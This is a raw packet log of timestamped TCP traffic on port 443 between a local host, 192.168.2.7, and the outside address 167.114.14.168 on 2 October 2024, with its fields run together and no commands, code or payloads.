                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.297612906 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.297641039 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.297699928 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.297719002 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.297772884 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.297772884 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.298211098 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.298233032 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.298301935 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.298307896 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.298319101 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.298356056 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.299329042 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.299350977 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.299400091 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.299407005 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.299417019 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.299474955 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.299926043 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.299946070 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.299977064 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.299988985 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.300029039 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.300029039 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.300388098 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.300407887 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.300458908 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.300465107 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.300543070 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.300543070 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.301043987 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.301067114 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.301146984 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.301146984 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.301155090 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.301603079 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.301628113 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.301692963 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.301692963 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.301700115 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.301873922 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.308402061 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.308423996 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.308526039 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.308537960 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.308754921 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.388303041 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.388341904 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.388422012 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.388447046 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.388488054 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.388488054 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.388808966 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.388830900 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.388884068 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.388890982 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.388927937 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.388927937 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.389942884 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.389971018 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.390038967 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.390044928 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.390067101 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.390075922 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.390491962 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.390515089 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.390561104 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.390567064 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.390609980 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.390609980 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.390877962 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.390911102 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.390965939 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.390973091 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.390990973 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.391046047 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.391649008 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.391669989 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.391752958 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.391752958 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.391767025 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.391825914 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.392225981 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.392252922 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.392328978 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.392328978 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.392335892 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.392374039 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.398984909 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.399012089 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.399112940 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.399120092 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.399127960 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.399168968 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.479053974 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.479094028 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.479172945 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.479172945 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.479197979 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.479238987 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.479556084 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.479577065 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.479634047 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.479640961 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.479655027 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.479698896 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.480700016 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.480726957 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.480832100 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.480832100 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.480843067 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.481125116 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.481209040 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.481235027 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.481300116 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.481300116 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.481307030 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.481475115 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.481867075 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.481890917 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.481933117 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.481940985 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.481983900 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.481983900 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.482496977 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.482517958 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.482600927 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.482600927 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.482609034 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.482696056 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.483043909 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.483068943 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.483140945 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.483140945 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.483148098 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.483401060 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.489605904 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.489626884 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.489677906 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.489689112 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.489737034 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.489737034 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.569688082 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.569711924 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.569781065 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.569781065 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.569793940 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.569881916 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.570194960 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.570219994 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.570255995 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.570261002 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.570291996 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.570321083 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.571410894 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.571434021 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.571465969 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.571477890 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.571533918 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.571533918 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.571945906 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.571969032 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.571995974 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.572006941 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.572043896 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.572043896 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.572555065 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.572572947 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.572597027 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.572608948 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.572645903 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.572645903 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.573107004 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.573127031 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.573153019 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.573164940 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.573200941 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.573200941 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.573703051 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.573724031 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.573766947 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.573772907 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.573822021 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.573822021 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.576788902 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.580269098 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.580291033 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.580368042 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.580368042 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.580375910 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.580406904 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.660468102 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.660500050 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.660576105 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.660576105 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.660589933 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.660629034 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.660841942 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.660871029 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.660949945 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.660949945 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.660957098 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.661024094 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.661861897 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.661891937 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.661940098 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.661945105 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.661988974 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.661988974 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.662476063 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.662497044 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.662554979 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.662561893 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.662659883 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.662911892 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.662933111 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.662992954 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.662992954 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.662998915 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.663079977 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.663448095 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.663470030 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.663533926 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.663533926 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.663539886 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.663839102 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.663865089 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.663918018 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.663918972 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.663924932 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.663976908 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.670690060 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.670711040 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.670814037 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.670821905 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.670919895 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.750945091 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.750983953 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.751086950 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.751086950 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.751105070 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.751524925 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.751552105 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.751602888 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.751602888 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.751610994 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.752485991 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.752506971 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.752536058 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.752536058 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.752545118 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.752588987 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.752588987 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.753110886 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.753137112 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.753185034 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.753185034 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.753191948 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.753701925 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.753726006 CEST44349713167.114.14.168192.168.2.7
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.753781080 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.753781080 CEST49713443192.168.2.7167.114.14.168
                                                                                                                                                                                                                                                          Oct 2, 2024 06:25:44.753788948 CEST44349713167.114.14.168192.168.2.7
